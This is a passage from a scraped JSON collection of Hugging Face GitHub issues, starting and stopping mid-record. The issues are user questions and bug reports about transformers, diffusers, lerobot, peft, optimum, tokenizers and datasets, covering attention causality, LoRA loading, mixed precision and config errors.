AutoModelForCausalLM.from_pretrained(\"meta-llama/Llama-3.1-8B\", device_map=\"auto\", torch_dtype=torch.bfloat16, attn_implementation=None)\nmodel.forward(input_tokens)\n```\n\nI'm asking this to see if `transformers` can be used as a numerical baseline to verify other inference backend", "url": "https://github.com/huggingface/transformers/issues/39565", "state": "closed", "labels": [], "created_at": "2025-07-21T21:49:05Z", "updated_at": "2025-08-21T08:34:59Z", "comments": 3, "user": "22quinn" }, { "repo": "huggingface/lerobot", "number": 1564, "title": "How are Episode Stats used?", "body": "I'm looking to create a subset of an episode (ie sec 2-4) in a 30 second episode, and wanted to know how episode_stats are used later on for training / inference? \nAre they used to normalize model inputs or are they used somewhere else as well? \n\nie. in modeling_act.py\n```\nself.normalize_inputs = Normalize(\n config.input_features, config.normalization_mapping, dataset_stats)\n```\n", "url": "https://github.com/huggingface/lerobot/issues/1564", "state": "closed", "labels": [ "question", "policies", "processor" ], "created_at": "2025-07-21T19:06:21Z", "updated_at": "2025-08-12T09:27:29Z", "user": "andlyu" }, { "repo": "huggingface/lerobot", "number": 1561, "title": "will you release the libero ft&eval setting?", "body": "hello your smolVLA is a wonderful work ,i notice that you finetuned it on the **libero** and evalaute at the same time.but i couldn't achieve the same or similar success rate**(just 76% ,much lower than your '96%')**\n**have you use the async inference in libero?**\nI think it must be the different hyperparameters with yours,so could you release the script(finetune.py & eval.py) or just tell me your ft&eval settings.here is my emal 602225349@qq.com \nthx u in advance~", "url": "https://github.com/huggingface/lerobot/issues/1561", "state": "closed", "labels": [ "enhancement", "question", "policies" ], "created_at": "2025-07-21T13:57:13Z", "updated_at": "2025-09-23T09:25:04Z", "user": "JuilieZ" }, { "repo": "huggingface/transformers", "number": 39554, "title": "Why `is_causal` is not used in `flash_attention_forward` ?", "body": "I want to perform bidirectional attention in the Qwen3 model to train an embedding model, so I passed `is_causal=False` in the model `forward` (I manually added `is_causal` arguments in all `forward` method such as `Qwen3Model` and `Qwen3Attention` in`modeling_qwen3.py`):\n\n```python\nclass Qwen3Attention(nn.Module):\n \"\"\"Multi-headed attention from 'Attention Is All You Need' paper\"\"\"\n ...\n\n def forward(\n self,\n hidden_states: torch.Tensor,\n position_embeddings: tuple[torch.Tensor, torch.Tensor],\n attention_mask: Optional[torch.Tensor],\n past_key_value: Optional[Cache] = None,\n cache_position: Optional[torch.LongTensor] = None,\n is_causal: Optional[bool] = True, # I add is_causal here\n **kwargs: Unpack[FlashAttentionKwargs],\n ) -> tuple[torch.Tensor, Optional[torch.Tensor], Optional[tuple[torch.Tensor]]]:\n ...\n\n attn_output, attn_weights = attention_interface(\n self,\n query_states,\n key_states,\n value_states,\n attention_mask,\n dropout=0.0 if not self.training else self.attention_dropout,\n scaling=self.scaling,\n sliding_window=self.sliding_window, # diff with Llama\n is_causal=is_causal, # and is_causal from the argument is passed to the attention_interface (e.g. `flash_attention_2`, `sdpa_attention_forward`)\n **kwargs,\n )\n```\n \nI can successfully change the causality of the attention in `sdpa_attention_forward`. However, I realized that it does not change the causality in the attention in `flash_attention_forward`. After diving into the implementation of `flash_attention_forward`, I found the reason in `flash_attention_forward` located at `transformers/integrations/flash_attention.py`:\n\n```python\ndef flash_attention_forward(\n module: torch.nn.Module,\n query: torch.Tensor,\n key: torch.Tensor,\n value: torch.Tensor,\n attention_mask: Optional[torch.Tensor],\n dropout: float = 0.0,\n scaling: Optional[float] = None,\n sliding_window: Optional[int] = None,\n softcap: Optional[float] = None,\n **kwargs,\n) -> tuple[torch.Tensor, None]:\n ...\n\n # FA2 always relies on the value set in the module, so remove it if present in kwargs to avoid passing it twice\n kwargs.pop(\"is_causal\", None)\n\n attn_output = _flash_attention_forward(\n query,\n key,\n value,\n attention_mask,\n query_length=seq_len,\n is_causal=module.is_causal, # here module is `Qwen3Attention`\n dropout=dropout,\n softmax_scale=scaling,\n sliding_window=sliding_window,\n softcap=softcap,\n use_top_left_mask=_use_top_left_mask,\n target_dtype=target_dtype,\n attn_implementation=module.config._attn_implementation,\n **kwargs,\n )\n```\n\nAs you can see, the `is_causal` argument is popped, and the `is_causal` of `Qwen3Attention` is used as the argument. Note that `Qwen3Attention.is_causal` is never changed, and its default value is `True`, so the `is_causal` argument passed into `_flash_attention_forward` will always be `True` regardless of any change. \n\nAfter I add a line of code to alter the `Qwen3Attention.is_causal`, i.e. `self.is_causal = is_causal` before passing the arguments into `attention_interface`, I can change the causality of `flash_attention_forward`. So I would like to know if it is a feature or a bug? Thank you!!", "url": "https://github.com/huggingface/transformers/issues/39554", "state": "closed", "labels": [ "Flash Attention" ], "created_at": "2025-07-21T12:08:00Z", "updated_at": "2025-11-11T12:32:41Z", "comments": 9, "user": "lucaswychan" }, { "repo": "huggingface/peft", "number": 2660, "title": "Custom models LoRA", "body": " Is there any way to fine-tune models that are not in the support list or custom models?\n\nCurrently, many public models have their LLM parts from Qwen. Can LLaMA-Factory use the Qwen template and only fine-tune the LLM part? Thank you", "url": "https://github.com/huggingface/peft/issues/2660", "state": "closed", "labels": [], "created_at": "2025-07-21T11:52:30Z", "updated_at": "2025-07-24T12:53:34Z", "comments": 6, "user": "stillbetter" }, { "repo": "huggingface/lerobot", "number": 1559, "title": "Is the current model framework suitable for using automatic mixed precision?", "body": "I saw that `.to(torch.float32)` and `.to(torch.bfloat16)` were used in many places in the Pi0 model code. Then I implemented parallel training of Pi0 based on accelerate, and found that if I want to use AMP, the code will report an error of dtype mismatch. I want to know whether the existing code is suitable for automatic mixed precision? If not, how should it be modified?", "url": "https://github.com/huggingface/lerobot/issues/1559", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-21T10:45:26Z", "updated_at": "2025-08-12T09:27:59Z", "user": "xliu0105" }, { "repo": "huggingface/transformers", "number": 39549, "title": "Is there plan to integrate ColQwen2.5 into Transformers?", "body": "### Model description\n\nIs ColQwen2ForRetrieval integrated into the transformers library, and are there plans to add [ColQwen2.5](https://github.com/illuin-tech/colpali/blob/main/colpali_engine/models/qwen2_5/colqwen2_5/modeling_colqwen2_5.py) in the future?\n\n### Open source status\n\n- [x] The model implementation is available\n- [x] The model weights are available\n\n### Provide useful links for the implementation\n\nhttps://github.com/illuin-tech/colpali/blob/main/colpali_engine/models/qwen2_5/colqwen2_5/modeling_colqwen2_5.py\n\nhttps://github.com/huggingface/transformers/pull/38391", "url": "https://github.com/huggingface/transformers/issues/39549", "state": "closed", "labels": [ "New model" ], "created_at": "2025-07-21T10:08:47Z", "updated_at": "2025-11-03T23:31:08Z", "comments": 0, "user": "rebel-thkim" }, { "repo": "huggingface/diffusers", "number": 11966, "title": "How about forcing the first and last block on device when groupoffloading is used?", "body": "**Is your feature request related to a problem? Please describe.**\nWhen group offloading is enabled, the offload and onload cannot be streamed between steps and this is really a big time comsuming problem.\n\n**Describe the solution you'd like.**\nIs it possible to add an option that could make the first and last block forced on device to avoid offload and onload?\n\n@a-r-r-o-w Could you please give some help? Thanks so much.\n", "url": "https://github.com/huggingface/diffusers/issues/11966", "state": "open", "labels": [ "contributions-welcome", "group-offloading" ], "created_at": "2025-07-21T08:38:30Z", "updated_at": "2025-12-02T15:30:23Z", "comments": 13, "user": "seed93" }, { "repo": "huggingface/tokenizers", "number": 1829, "title": "The parameter in initial_alphabet of the \"class BpeTrainer(Trainer)\" does not allow more than one character to initialized", "body": "Hi everyone,\nI am working on Tamil and Sinhala languages which are morphologically rich languages, in these languages a character is actually a combination of multiple unicode codepoints (similar to emojis) so it would be greatly beneficial to initialize the BPE alphabet with graphemes instead of the characters. Is there any work around for this which i can use to initialize the BPE algorithm? Thanks in advance!!", "url": "https://github.com/huggingface/tokenizers/issues/1829", "state": "open", "labels": [], "created_at": "2025-07-21T08:30:21Z", "updated_at": "2025-07-21T08:30:21Z", "comments": 0, "user": "vmenan" }, { "repo": "huggingface/lerobot", "number": 1554, "title": "How to use local datasets to train and evaluate", "body": "Due to network issues, I want to use only local datasets during training and evaluation and prevent huggingface from uploading data or retrieve datasets on the hub.Is there any good solution? ", "url": "https://github.com/huggingface/lerobot/issues/1554", "state": "closed", "labels": [ "question", "dataset" ], "created_at": "2025-07-21T07:54:07Z", "updated_at": "2025-10-08T12:58:32Z", "user": "zym123321" }, { "repo": "huggingface/optimum", "number": 2324, "title": "AutoConfig.from_dict Missing in transformers==4.51.3 \u2014 Incompatibility with optimum==1.26.1", "body": "### System Info\n\n```shell\nI am running into a critical compatibility issue between optimum and recent versions of transformers.\n\n\u2757 Error Summary\nWhen using:\ntransformers==4.51.3\noptimum==1.26.1\nonnx==1.17.0\nonnxruntime==1.20.0\n\nThe following runtime error is thrown when attempting to load an ONNX model using ORTModelForTokenClassification.from_pretrained:\n\nAttributeError: type object 'AutoConfig' has no attribute 'from_dict'\n\nThis traces back to:\nconfig = AutoConfig.from_pretrained(...)\n# \u2193 internally calls:\nreturn CONFIG_MAPPING[pattern].from_dict(config_dict, **unused_kwargs)\n\nHowever, in transformers>=4.48, the method AutoConfig.from_dict appears to have been deprecated or removed. This causes optimum to break at runtime when trying to load ONNX models.\n\n\ud83d\udce6 Package Versions\ntransformers - 4.51.3\noptimum - 1.26.1\nonnx - 1.17.0\nonnxruntime - 1.20.0\ntorch - 2.2.6\n\nDue to a security advisory, we're required to upgrade to transformers>=4.48. However, even with the latest optimum==1.26.1, it appears optimum is not yet updated for compatibility with changes introduced in recent transformers versions.\n\nASK:\nIs support for transformers>=4.48 (particularly 4.51.3) planned in an upcoming optimum release?\nCould this AutoConfig.from_dict dependency be refactored or conditionally patched to restore compatibility?\nIs there a compatibility roadmap available between transformers and optimum for ONNX workflows?\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nUse transformers==4.51.3 and optimum==1.26.1\n\nLoad an exported ONNX model using ORTModelForTokenClassification.from_pretrained(...)\n\nObserve the AttributeError about AutoConfig.from_dict\n\n### Expected behavior\n\nWhen using optimum==1.26.1 with transformers>=4.48 (specifically 4.51.3), the following should work without error:\nfrom optimum.onnxruntime import ORTModelForTokenClassification\nmodel = ORTModelForTokenClassification.from_pretrained(\"path/to/onnx/model\")\n\nThe model should load successfully using the ONNX Runtime backend.\n\nInternally, AutoConfig.from_pretrained(...) should function correctly regardless of changes in the transformers API (e.g., deprecation/removal of from_dict).\n\nONNX workflows should remain compatible with newer transformers versions, allowing teams to benefit from critical updates and security patches without breaking ONNX integration.", "url": "https://github.com/huggingface/optimum/issues/2324", "state": "open", "labels": [ "bug" ], "created_at": "2025-07-21T06:04:58Z", "updated_at": "2025-08-01T07:10:20Z", "comments": 5, "user": "rratnakar09" }, { "repo": "huggingface/diffusers", "number": 11964, "title": "KeyError when loading LoRA for Flux model: missing lora_unet_final_layer_adaLN_modulation_1 weights", "body": "I'm trying to run Overlay-Kontext-Dev-LoRA locally by loading the LoRA weights using the pipe.load_lora_weights() function. However, I encountered the following error during execution:\n\n> KeyError: 'lora_unet_final_layer_adaLN_modulation_1.lora_down.weight'\n\n\n```\nimport torch\nfrom diffusers import DiffusionPipeline\nfrom diffusers.utils import load_image\n\nLoad the pipeline with a specific torch data type for GPU optimization\npipe = DiffusionPipeline.from_pretrained(\n\"black-forest-labs/FLUX.1-Kontext-dev\",\ntorch_dtype=torch.bfloat16\n)\n\nMove the entire pipeline to the GPU\npipe.to(\"cuda\")\n\nLoad LoRA weights (this will also be on the GPU)\npipe.load_lora_weights(\"ilkerzgi/Overlay-Kontext-Dev-LoRA\")\n\nprompt = \"Place it\"\ninput_image = load_image(\"img2.png\")\n\nThe pipeline will now run on the GPU\nimage = pipe(image=input_image, prompt=prompt).images[0]\n\nimage.save(\"output_image.png\")\n```\n\n\nEnvironment:\ndiffusers version: 0.35.0.dev0\nPython: 3.10\nRunning locally on a ubuntu environment with RTX 4090\n\n\n\n> Additional Note:\n> The model file size is also quite large. I may need to quantize it before running it on the 4090 to avoid out-of-memory issues.\n> \n> Would appreciate any help or suggestions on how to resolve the loading issue. Thank you!\n\n", "url": "https://github.com/huggingface/diffusers/issues/11964", "state": "open", "labels": [], "created_at": "2025-07-21T05:16:34Z", "updated_at": "2025-07-21T09:14:00Z", "comments": 1, "user": "NEWbie0709" }, { "repo": "huggingface/transformers", "number": 39545, "title": "Is the new Intel\u2013Weizmann speculative decoding algorithm integrated into Transformers?", "body": "Hi,\n\nI recently read about a new speculative decoding algorithm developed by Intel Labs and the Weizmann Institute, which reportedly improves inference speed by up to 2.8\u00d7, even when using draft and target models with different vocabularies or architectures.\n\nReferences:\n\n- [Intel Newsroom](https://newsroom.intel.com/artificial-intelligence/intel-weizmann-institute-speed-ai-with-speculative-decoding-advance?utm_source=chatgpt.com)\n- [CTech Article](https://www.calcalistech.com/ctechnews/article/h1z7pydlex)\n\nSeveral sources (including Intel press releases and third-party writeups) claim that this algorithm has already been integrated into the Hugging Face Transformers library.\nHowever, I haven\u2019t found any reference to this new version in the official Transformers documentation\n\n\nMy Questions:\n\n1. Has this Intel\u2013Weizmann speculative decoding algorithm actually been integrated into transformers?\n2. If so, where can I find documentation or usage examples for how to enable it?\n\nThanks in advance for your help! This looks like a powerful advancement, and I'd love to test it.", "url": "https://github.com/huggingface/transformers/issues/39545", "state": "closed", "labels": [], "created_at": "2025-07-21T02:47:48Z", "updated_at": "2025-07-22T12:15:54Z", "comments": 4, "user": "NEWbie0709" }, { "repo": "huggingface/lerobot", "number": 1552, "title": "Support smolvla training on Intel GPU", "body": "Current script is only supporting `cuda`, `mps` and `cpu`. \nWith PyTorch 2.7 with Intel GPU support, once PyTorch is installed, Intel GPU can be utilized in the training script.", "url": "https://github.com/huggingface/lerobot/issues/1552", "state": "open", "labels": [ "enhancement", "question", "policies" ], "created_at": "2025-07-21T01:47:38Z", "updated_at": "2025-10-09T07:40:10Z", "user": "xiangyang-95" }, { "repo": "huggingface/transformers", "number": 39542, "title": "ValueError: You cannot specify both decoder_input_ids and decoder_inputs_embeds at the same time", "body": "### System Info\n\n- `transformers` version: 4.53.2\n- Platform: **Ubuntu 22.04** Linux 5.15.0-139-generic\n- **Python 3.10.18** + ipykernel 6.29.5\n- Pytorch 2.7.1+cu118\n\n### Who can help?\n\n@ArthurZucker \n@SunMarc \n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n I want to build a new MT model with **bert-based encoder** and a **decoder from opus-mt-en-zh** (loaded as `MarianMTModel`), BUT when I execute `Trainer.train()`, It report ValueError: `You cannot specify both decoder_input_ids and decoder_inputs_embeds at the same time`. This is code about my model and trainer.\n Thanks for helping!\n\n```Python\n# ManchuBERT Encoder + Opus-MT-zh Decoder\n\nimport torch\nfrom torch import nn\nfrom transformers.modeling_outputs import Seq2SeqLMOutput\n\n\ndef get_extended_attention_mask(attention_mask, input_shape, device, dtype=torch.float32):\n \"\"\"\n attention_mask: [B, seq_len] \n return: [B, 1, 1, seq_len] \n \"\"\"\n mask = attention_mask[:, None, None, :] # [B, 1, 1, seq_len]\n mask = mask.to(dtype=dtype)\n mask = (1.0 - mask) * -10000.0\n return mask\n\n\nclass ManchuZhMT(nn.Module):\n def __init__(self, bert, marian):\n super().__init__()\n self.decoder_embeddings = marian.model.decoder.embed_tokens\n self.embeddings = bert.embeddings\n self.encoder = bert.encoder\n self.decoder = marian.model.decoder\n self.lm_head = marian.lm_head\n self.final_logits_bias = marian.final_logits_bias\n self.config = marian.config\n\n def forward(self,\n input_ids=None,\n attention_mask=None,\n decoder_input_ids=None,\n decoder_attention_mask=None,\n labels=None,\n **kwargs):\n\n\n hidden_states = self.embeddings(input_ids=input_ids)\n attention_mask = attention_mask.to(dtype=torch.float32)\n\n extended_mask = get_extended_attention_mask(attention_mask, input_ids.shape, input_ids.device)\n\n enc_out = self.encoder(hidden_states=hidden_states,\n attention_mask=extended_mask,\n return_dict=True)\n\n dec_out = self.decoder(\n input_ids=decoder_input_ids,\n attention_mask=decoder_attention_mask,\n encoder_hidden_states=enc_out.last_hidden_state,\n encoder_attention_mask=extended_mask,\n return_dict=True)\n\n logits = self.lm_head(dec_out.last_hidden_state) + self.final_logits_bias\n\n loss = None\n if labels is not None:\n loss_fct = nn.CrossEntropyLoss(ignore_index=-100)\n loss = loss_fct(logits.view(-1, logits.size(-1)), labels.view(-1))\n\n return Seq2SeqLMOutput(loss=loss, logits=logits)\n\n def prepare_inputs_for_generation(self, *args, **kwargs):\n return self.decoder.prepare_inputs_for_generation(*args, **kwargs)\n\n def _prepare_encoder_decoder_kwargs_for_generation(self, *args, **kwargs):\n return self.decoder._prepare_encoder_decoder_kwargs_for_generation(*args, **kwargs)\n\nmodel = ManchuZhMT(manchu_model, chn_model)\nprint(model)\n\n# freeze Decoder + LM Head \nfor p in model.decoder.parameters():\n p.requires_grad = False\nfor p in model.lm_head.parameters():\n p.requires_grad = False\n```\n\n```Python\n# Add LoRA for Encoder\nfrom peft import LoraConfig, get_peft_model, TaskType\n\nnum_layers = len(model.encoder.layer)\ntarget_modules = []\nfor i in range(num_layers):\n target_modules.extend([\n f\"encoder.layer.{i}.attention.self.query\",\n f\"encoder.layer.{i}.attention.self.key\",\n f\"encoder.layer.{i}.attention.self.value\",\n f\"encoder.layer.{i}.attention.output.dense\",\n f\"encoder.layer.{i}.intermediate.dense\",\n f\"encoder.layer.{i}.output.dense\",\n ])\n\nlora_config = LoraConfig(\n task_type=TaskType.SEQ_2_SEQ_LM, \n target_modules=target_modules,\n r=16,\n lora_alpha=32,\n lora_dropout=0.05,\n bias=\"none\",\n)\nmodel = get_peft_model(model, lora_config)\nmodel.print_trainable_parameters()\n```\n\n```Python\n# Start Train!\nfrom transformers import Seq2SeqTrainer, Seq2SeqTrainingArguments\n\nargs = Seq2SeqTrainingArguments(\n output_dir=\"./lora_with_bert\",\n per_device_train_batch_size=batch_size,\n per_device_eval_batch_size=batch_size,\n num_train_epochs=10,\n learning_rate=3e-4,\n fp16=True,\n save_strategy=\"epoch\",\n predict_with_generate=True,\n logging_steps=100,\n report_to=\"none\",\n)\n\ntrainer = Seq2SeqTrainer(\n model=model,\n args=args,\n train_dataset=tokenized_ds[\"train\"],\n eval_dataset=tokenized_ds[\"val\"],\n tokenizer=manchu_tok,\n)\ntrainer.train()\ntrainer.save_model(\"./lora_with_bert/final\")\n```\n\n\n### Expected behav", "url": "https://github.com/huggingface/transformers/issues/39542", "state": "closed", "labels": [ "Usage", "Good First Issue", "trainer", "bug" ], "created_at": "2025-07-21T01:06:27Z", "updated_at": "2025-08-22T05:53:51Z", "comments": 10, "user": "xjackzenvey" }, { "repo": "huggingface/transformers", "number": 39551, "title": "InformerForPrediction [I would like to seek your opinions, everyone, How can I set the dynamic real features for prediction]", "body": "Here is the description cited from the docs of InformerForPrediction\uff1a\n\n> future_time_features (torch.FloatTensor of shape (batch_size, prediction_length, num_features)) \u2014 Required time features for the prediction window, which the model internally will add to future_values. These could be things like \u201cmonth of year\u201d, \u201cday of the month\u201d, etc. encoded as vectors (for instance as Fourier features). These could also be so-called \u201cage\u201d features, which basically help the model know \u201cat which point in life\u201d a time-series is. Age features have small values for distant past time steps and increase monotonically the more we approach the current time step. Holiday features are also a good example of time features.\nThese features serve as the \u201cpositional encodings\u201d of the inputs. So contrary to a model like BERT, where the position encodings are learned from scratch internally as parameters of the model, the Time Series Transformer requires to provide additional time features. The Time Series Transformer only learns additional embeddings for static_categorical_features.\nAdditional dynamic real covariates can be concatenated to this tensor, with the caveat that these features must but known at prediction time.\nThe num_features here is equal to config.num_time_features+config.num_dynamic_real_features`.\nHi, I have a question regarding inference in time series forecasting models.\n\nWhen making predictions, how can I obtain or construct the dynamic_real_features for the future steps (i.e., for the prediction_length)?\nMore specifically, how should I concatenate the corresponding dynamic_real_features and time_features during inference?\n\nIs it appropriate to use all-zero placeholders for the future dynamic_real_features?\nWill this affect prediction performance, considering that during training the model has access to real values for these features over the full context + prediction window?\n\nOn a related note:\nIn time series forecasting, is it necessary for all timestamps in the input window to be equally spaced (e.g., every x minutes)?\nOr can I use sequences with irregular time intervals, as long as the time order is preserved?\n\nThanks for your help!\n\n\n", "url": "https://github.com/huggingface/transformers/issues/39551", "state": "closed", "labels": [], "created_at": "2025-07-20T11:38:50Z", "updated_at": "2025-08-28T08:03:20Z", "user": "2004learner" }, { "repo": "huggingface/diffusers", "number": 11961, "title": "New Adapter/Pipeline Request: IT-Blender for Creative Conceptual Blending", "body": "## Model/Pipeline/Scheduler description\n\n### Name of the model/pipeline/scheduler\n\"Image-and-Text Concept Blender\" (IT-Blender), a diffusion adapter that blends visual concepts from a real reference image with textual concepts from a prompt in a disentangled manner. The goal is to enhance human creativity in design tasks.\n\n### Project page & ArXiv link\nPaper link: https://arxiv.org/pdf/2506.24085\nThe project website: https://imagineforme.github.io/ \n**(a lot of interesting feasible examples are in the project page.)**\n
\n\n\"Image\"\n\n### What is the proposed method?\n\nIT-Blender is an adapter that works with existing models like SD and FLUX. Its core innovation is the **Blended Attention (BA)** module. This module modifies the standard self-attention layers. It uses a two-stream approach (a noisy stream for generation and a clean reference stream for the image) and introduces trainable parameters within an Image Cross-Attention (imCA) term to bridge the distributional shift between clean and noisy latents.\n\n### Is the pipeline different from an existing pipeline?\nYes. The IT-Blender pipeline is distinct for a few reasons:\n1. **Native Image Encoding**: It uses the diffusion model's own denoising network to encode the reference image by forwarding a clean version at \"t=0\". This avoids an external image encoder to better preserve details.\n2. **Two-Stream Processing**: During training and inference, it processes a \"noisy stream\" for the text-guided generation and a \"reference stream\" for the clean visual concept image simultaneously.\n3. **Blended Attention Integration**: The pipeline replaces standard self-attention modules with the new Blended Attention (BA) module, which is designed to physically separate textual and visual concept processing.\n\n### Why is this method useful?\nThe method is particularly effective for creative tasks like product design, character design, and graphic design, as shown by the extensive examples in the paper and project page. We believe it would be a valuable and unique addition to the `diffusers` library.\n\n### Open source status\n\n- [x] The model implementation is available.\n- [x] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\n**Demo page**: https://huggingface.co/spaces/WonwoongCho/IT-Blender\n**GitHub page for inference**: https://github.com/WonwoongCho/IT-Blender\nNote that we are using our own diffusers with a little bit of changes (`requirements.txt` in the github repo);\n\n**Changed Diffusers Pipeline for FLUX**: https://github.com/WonwoongCho/diffusers/blob/main/src/diffusers/pipelines/flux/pipeline_flux.py\n**Changed Diffusers Pipeline for SD1.5**: https://github.com/WonwoongCho/diffusers/blob/main/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion.py\n", "url": "https://github.com/huggingface/diffusers/issues/11961", "state": "open", "labels": [], "created_at": "2025-07-20T03:07:38Z", "updated_at": "2025-07-20T03:08:06Z", "comments": 0, "user": "WonwoongCho" }, { "repo": "huggingface/transformers", "number": 39522, "title": "T5Gemma failing on provided example", "body": "### System Info\n\n- `transformers` version: 4.53.2\n- Platform: Linux-6.14.0-23-generic-x86_64-with-glibc2.41\n- Python version: 3.13.3\n- Huggingface_hub version: 0.33.4\n- Safetensors version: 0.5.3\n- Accelerate version: 1.8.1\n- Accelerate config: \t- compute_environment: LOCAL_MACHINE\n\t- distributed_type: NO\n\t- mixed_precision: bf16\n\t- use_cpu: False\n\t- debug: False\n\t- num_processes: 1\n\t- machine_rank: 0\n\t- num_machines: 1\n\t- gpu_ids: all\n\t- rdzv_backend: static\n\t- same_network: True\n\t- main_training_function: main\n\t- enable_cpu_affinity: True\n\t- downcast_bf16: no\n\t- tpu_use_cluster: False\n\t- tpu_use_sudo: False\n\t- tpu_env: []\n\t- dynamo_config: {'dynamo_backend': 'INDUCTOR'}\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.7.1+cu128 (CUDA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n- Using GPU in script?: \n- GPU type: NVIDIA GeForce RTX 5060 Ti\n\n### Who can help?\n\n@ArthurZucker and @itazap \n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nRun the example from the T5Gemma docs page.\n```\necho -e \"Question: Why is the sky blue? Answer:\" | transformers run --task text2text-generation --model google/t5gemma-s-s-ul2 --device 0\n```\n\n### Expected behavior\n\nWhen I run I get:\n```\nFile \".venv/lib/python3.13/site-packages/transformers/configuration_utils.py\", line 209, in __getattribute__\n return super().__getattribute__(key)\n ~~~~~~~~~~~~~~~~~~~~~~~~^^^^^\nAttributeError: 'T5GemmaConfig' object has no attribute **'vocab_size'**\n```\nIndeed. The vocab_size is a sub attribute from encoder/decoder, not a direct attribute.\n", "url": "https://github.com/huggingface/transformers/issues/39522", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-19T11:07:26Z", "updated_at": "2025-08-27T07:51:08Z", "comments": 7, "user": "jadermcs" }, { "repo": "huggingface/lerobot", "number": 1540, "title": "Controlling robot with text using SmolVLA", "body": "Is it possible to control the robot with text inputs? I thought that's what a VLA model was...\n\nI cannot find any instructions on how to do this anywhere... \n\nI found this https://huggingface.co/masato-ka/smolvla_block_instruction , but control_robot was split into multiple files recently - none of which seem to work.\n\n", "url": "https://github.com/huggingface/lerobot/issues/1540", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-18T23:09:11Z", "updated_at": "2025-08-12T09:35:59Z", "user": "drain-pipe" }, { "repo": "huggingface/diffusers", "number": 11956, "title": "Frequency-Decoupled Guidance (FDG) for diffusion models", "body": "FDG is a new method for applying CFG in the frequency domain. It improves generation quality at low CFG scales while inherently avoiding the harmful effects of high CFG values. It could be a nice addition to the guiders part of diffusers. The implementation details for FDG are available on page 19 of the paper.\n\nhttps://huggingface.co/papers/2506.19713", "url": "https://github.com/huggingface/diffusers/issues/11956", "state": "closed", "labels": [ "help wanted", "Good second issue", "contributions-welcome", "advanced", "consider-for-modular-diffusers" ], "created_at": "2025-07-18T19:12:50Z", "updated_at": "2025-08-07T05:51:03Z", "comments": 5, "user": "Msadat97" }, { "repo": "huggingface/datasets", "number": 7689, "title": "BadRequestError for loading dataset?", "body": "### Describe the bug\n\nUp until a couple days ago I was having no issues loading `Helsinki-NLP/europarl` and `Helsinki-NLP/un_pc`, but now suddenly I get the following error:\n\n```\nhuggingface_hub.errors.BadRequestError: (Request ID: ...)\n\nBad request:\n* Invalid input: expected array, received string * at paths * Invalid input: expected boolean, received string * at expand\n\u2716 Invalid input: expected array, received string\n \u2192 at paths\n\u2716 Invalid input: expected boolean, received string\n \u2192 at expand\n```\n\nI tried with both `4.0.0` and `3.5.1` since this dataset uses `trust_remote_code`, but I get the same error with both.\n\nWhat can I do to load the dataset? I checked the documentation and GitHub issues here, but couldn't find a solution.\n\n### Steps to reproduce the bug\n\n```python\nimport datasets\nds = datasets.load_dataset(\"Helsinki-NLP/europarl\", \"en-fr\", streaming=True, trust_remote_code=True)[\"train\"]\n```\n\n### Expected behavior\n\nThat the dataset loads as it did a couple days ago.\n\n### Environment info\n\n- `datasets` version: 3.5.1\n- Platform: Linux-4.18.0-513.24.1.el8_9.x86_64-x86_64-with-glibc2.28\n- Python version: 3.11.11\n- `huggingface_hub` version: 0.30.2\n- PyArrow version: 20.0.0\n- Pandas version: 2.2.2\n- `fsspec` version: 2024.6.1", "url": "https://github.com/huggingface/datasets/issues/7689", "state": "closed", "labels": [], "created_at": "2025-07-18T09:30:04Z", "updated_at": "2025-07-18T11:59:51Z", "comments": 17, "user": "WPoelman" }, { "repo": "huggingface/diffusers", "number": 11951, "title": "Kontext model loading quantization problem", "body": "Hello, can kontext be loaded quantitatively at present? Because I only have a 4090 with 24g video memory, the current fp16 loading method will cause OOM. Like flux, can it be loaded with torchao or gguf, so that this model can run on 4090?", "url": "https://github.com/huggingface/diffusers/issues/11951", "state": "closed", "labels": [], "created_at": "2025-07-18T03:20:48Z", "updated_at": "2025-07-18T05:39:28Z", "comments": 2, "user": "babyta" }, { "repo": "huggingface/transformers", "number": 39484, "title": "Transformers still tries to use apex.amp which is no longer a thing in apex.", "body": "### System Info\n\n\n```\nroot@12bb27e08b1b:/# pip show transformers\nName: transformers\nVersion: 4.52.3\n```\n\n\ntrainer.py contains this:\n```\nif is_apex_available():\n from apex import amp\n```\n\nApex (built from source, as they recommend) does no longer come with amp.\n\nHow to reproduce?\n1. install transformers\n2. install apex\n3. python `from trl import SFTTrainer`\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nHow to reproduce?\n1. install transformers\n2. install apex\n3. python `from trl import SFTTrainer`\n\n### Expected behavior\n\n\nThere should not be `from apex import amp` in the code base", "url": "https://github.com/huggingface/transformers/issues/39484", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-17T16:43:14Z", "updated_at": "2025-08-25T08:03:03Z", "comments": 4, "user": "yselivonchyk" }, { "repo": "huggingface/datasets", "number": 7688, "title": "No module named \"distributed\"", "body": "### Describe the bug\n\nhello, when I run the command \"from datasets.distributed import split_dataset_by_node\", I always met the bug \"No module named 'datasets.distributed\" in different version like 4.0.0, 2.21.0 and so on. How can I solve this?\n\n### Steps to reproduce the bug\n\n1. pip install datasets\n2. from datasets.distributed import 